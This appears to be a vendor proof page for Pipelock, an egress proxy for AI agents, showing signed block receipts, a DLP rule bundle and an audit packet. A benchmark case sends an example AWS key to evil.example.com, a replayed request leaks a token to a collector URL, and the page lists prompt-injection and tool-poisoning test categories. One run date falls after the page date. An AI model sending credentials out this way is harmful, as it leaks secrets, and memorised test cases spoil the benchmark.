Proof · v3.6.0 · Aug 8, 2026

Detection claims need receipts. Three components turn claims into evidence.

Every Pipelock detection claim is backed by an open corpus you can re-run, signed rules you can verify, and Ed25519-signed reports your auditor can keep. No marketing assertions. No closed-source vendor box. Run it yourself.

  • Apache-2.0 core
  • Public methodology
  • Public attack cases
  • Signed reports
  • Offline license

Recorded decisions

Watch a secret get stopped

Real requests agents made, replayed. Each scene runs twice: first with nothing in the path, then through Pipelock. Recorded with Pipelock v3.3.0, Aug 5, 2026. Signed, so you can check every one.

Blocked: secret exfiltration over a URL

Scene: Blocked: secret exfiltration over a URL.

Without Pipelock: A bare agent puts a credential in a query parameter and the value escapes to the collector.

With Pipelock: Pipelock's DLP layer detects the credential shape in the URL before any DNS resolution and blocks the request. The signed receipt records the block; the value never leaves.

The decision was block at layer core_dlp, matched pattern core DLP match: AWS Access ID (critical), recorded in the signed receipt below.

01

The escape

A bare agent puts a credential in a query parameter and the value escapes to the collector.

02

The block

Pipelock's DLP layer detects the credential shape in the URL before any DNS resolution and blocks the request. The signed receipt records the block; the value never leaves.

https://collector.example.com/collect?token=[redacted-value]

03

The receipt

The decision is signed by the mediator. The shipped verifier checks the signature offline; a receipt that was altered after signing fails the check.

Not everything is blocked: the same recording shows a safe read to a read-only lab documentation endpoint passing, and that allow decision is signed too.

Raw manifest · verify offline: pipelock-verifier audit-packet . --key 91dfb23882a8acf28f624985030ca1798a3efbbcee2bb8bdda8f452612eb755a

A receipt for every claim

Each pillar is a separate open-source project. Each one feeds the next.

01 · Validate

Agent Egress Bench

A public corpus of adversarial test cases. The same corpus Pipelock tests itself against.

{
  "schema_version": 4,
  "id": "url-dlp-aws-key-001",
  "category": "url",
  "title": "AWS access key in query parameter",
  "description": "Agent attempts to send an AWS access key via URL query string.",
  "input_type": "url",
  "transport": "fetch_proxy",
  "payload": {
    "method": "GET",
    "url": "https://evil.example.com/api?key=AKIAIOSFODNN7EXAMPLE"
  },
  "expected_verdict": "block",
  "severity": "critical",
  "capability_tags": ["url_dlp"],
  "requires":["url_dlp_scanning"],
  "false_positive_risk": "low",
  "why_expected": "aws_access_key_pattern",
  "notes": "Standard 20-char AWS access key test string.",
  "source": "AWS credential format documentation"
}
real case file · url-dlp-aws-key-001.json · snapshot 79a51f084fc4
  • 191 block-expected attack cases (268 total incl. 76 false-positive controls and 1 warn-class drift case) across 18 categories: DLP evasion, prompt injection, SSRF, tool poisoning, encoding chains, hostname exfiltration, WebSocket DLP, A2A scanning.
  • Run against any proxy. The bench is tool-neutral. Same corpus, any defender.
  • Public scoreboard at /gauntlet/ with verifiable per-category results.

Corpus snapshot verified against agent-egress-bench@79a51f084fc4.

02 · Govern

Pipelock Rules

Community detection patterns distributed as Ed25519-signed YAML bundles. Hot-reloadable. Tampered rules fail signature verification.

format_version: 1
name: pipelock-community
version: "2026.07.0"
author: pipelock
description: "Community detection rules for AI agent traffic"
homepage: "https://pipelab.org/rules/pipelock-community"
min_pipelock: "1.4.0"
license: "Apache-2.0"

rules:
  - id: dlp-1password-service-account-token
    type: dlp
    status: stable
    name: "1Password Service Account Token"
    description: "Detects 1Password service account tokens"
    severity: critical
    confidence: high
    references:
      - "https://developer.1password.com/docs/service-accounts/security/"
    tags:
      - "provider:1password"
      - "owasp-llm:LLM06"
    pattern:
      regex: 'ops_[A-Za-z0-9]{20,}'
real bundle head · pipelock-community/bundle.yaml · signature: bundle.yaml.sig
  • Signed bundles verified at install time. pipelock rules verify checks signatures against your trusted keyring.
  • One flipped byte is fatal. Run 2026-08-24 against a copy of the installed bundle:
    $ pipelock rules verify
    OK    pipelock-community (signature OK)
    
    All 1 bundle(s) verified.
    
    # flip ONE byte in bundle.yaml, then verify again:
    $ pipelock rules verify
    FAIL  pipelock-community: integrity check: bundle signature: no matching signer found
    1 bundle(s) failed verification
    
  • Production signing key: 70b991eb77816fc4ef0ae6a54d8a4119ddc5a16c9711c332c39e743079f6c63e
  • The trust model is public: which key signs what, and what a failed check refuses to load. Install flow + trust model.

03 · Attest

Pipelock Assess

Generate signed security reports with compliance evidence. Auditors verify offline.

{
  "schema_version": "pipelock.audit_packet.v0",
  "packet_id": "ap-secret-exfil-url-blocked",
  "generated_at": "2026-08-05T01:16:25Z",
  "run": {
    "provider": "local",
    "agent_identity": "pipelock-lab-agent",
    "started_at": "2026-08-05T01:16:25Z",
    "completed_at": "2026-08-05T01:16:25Z"
  },
  "policy": {
    "policy_hashes": [
      "sha256:f2fc88decf137ae433c2376cc6059af894989f2e2a88e01cf521180ca12c34b9"
    ]
  },
  "summary": {
    "receipt_count": 2,
    "totals": {
      "allow": 1,
      "block": 1,
      "warn": 0,
      "ask": 0,
      "strip": 0,
      "forward": 0,
      "redirect": 0,
      "other": 0
    },
    "transports": {
      "fetch": 1,
      "receipt_session": 1
    },
    "layers": {
      "core_dlp": 1
    },
    "domains_touched": [
      "collector.example.com"
    ]
  },
  "verifier": {
    "verdict": "valid",
    "trusted": true,
    "receipt_count": 2,
    "root_hash": "e46ce69a5c3ca1f83320f905eb6583e5477bad41f752ed3d201ce56fe3e045a3",
    "final_seq": 1,
    "signer_key": "91dfb23882a8acf28f624985030ca1798a3efbbcee2bb8bdda8f452612eb755a",
    "output_file": "verifier.txt"
  },
  "posture": {
    "enforcement_mode": "synthetic_lab",
    "runner_os": "linux",
    "raw_socket_status": "unknown",
    "docker_socket_status": "unknown",
    "dns_udp_status": "unknown",
    "browser_proxy_status": "unknown",
    "websocket_frame_scanning": "off",
    "unsupported_paths": []
  },
  "artifacts": {
    "packet": "packet.json",
    "summary": "summary.md",
    "evidence": "evidence.jsonl",
    "verifier": "verifier.txt"
  }
}
real packet excerpt · full packet.json on this site · verifier verdict inside is the file’s own
  • 7 compliance frameworks mapped: OWASP MCP Top 10 Agentic Top 10 MITRE ATLAS EU AI Act NIST AI RMF HIPAA SOC 2
  • Ed25519-signed bundles are tamper-evident. Demo bundles verify against the Pipelock demo key; customer bundles verify against the deployment's pinned key.
  • Offline by design. No phone home, no telemetry, no third-party verification service.
  • The verifier’s own words, written by the verifier during the recorded run and served on this site:
    Pipelock audit packet — receipt chain verification
    scenario: secret-exfil-url-blocked
    receipts: 2
    verdict: valid (trusted)
    root_hash: e46ce69a5c3ca1f83320f905eb6583e5477bad41f752ed3d201ce56fe3e045a3
    signer_key: 91dfb23882a8acf28f624985030ca1798a3efbbcee2bb8bdda8f452612eb755a
    
    Verify it yourself from this directory:
      pipelock-verifier audit-packet . --key 91dfb23882a8acf28f624985030ca1798a3efbbcee2bb8bdda8f452612eb755a
    

What is signed

Three surfaces, three trust anchors: official rules key, Pipelock demo/report key, and customer deployment key.

01

Rules bundles

Each YAML bundle is signed at publish time. pipelock rules verify checks the signature against your trusted keyring before load. A tampered bundle fails to load and the proxy keeps the previous state.

official rules key · 70b991eb…79f6c63e

02

Action receipts

Every block decision can emit a signed action receipt. The receipt is short-form (verdict, layer, classes detected, redaction class counts), and the signature is verifiable against the deployment's pinned public key. Public Pipelock demo receipts use the Pipelock demo key.

pipelock demo key · 91dfb238…12eb755a

03

Assess reports

pipelock assess writes a hash-chained bundle with Ed25519 signatures over each section. Auditors verify with pipelock assess verify using the trusted public key. No network call.

customer deployment key · pinned per deployment

Verify yourself

$ pipelock rules verify
$ pipelock assess verify ./assessment-a1b2c3d4/
$ pipelock verify-receipt ./receipt.json --key 70b991eb77816fc4ef0ae6a54d8a4119ddc5a16c9711c332c39e743079f6c63e

The key above is the official rules signing key, not a universal receipt key. Rules verify against the official key, public demo reports verify against the Pipelock demo key, and customer receipts verify against the deployment's pinned key.

Receipts in numbers

268

Bench cases

18

Categories

65

DLP patterns

34

Injection patterns

7

Frameworks

~1ms

Scan latency

Don't take our word for it

Three offline-verifiable surfaces. Every link goes to a real artifact.

Further reading

Independent coverage

Verify it yourself

Public methodology. Public attack cases. Public Pipelock results.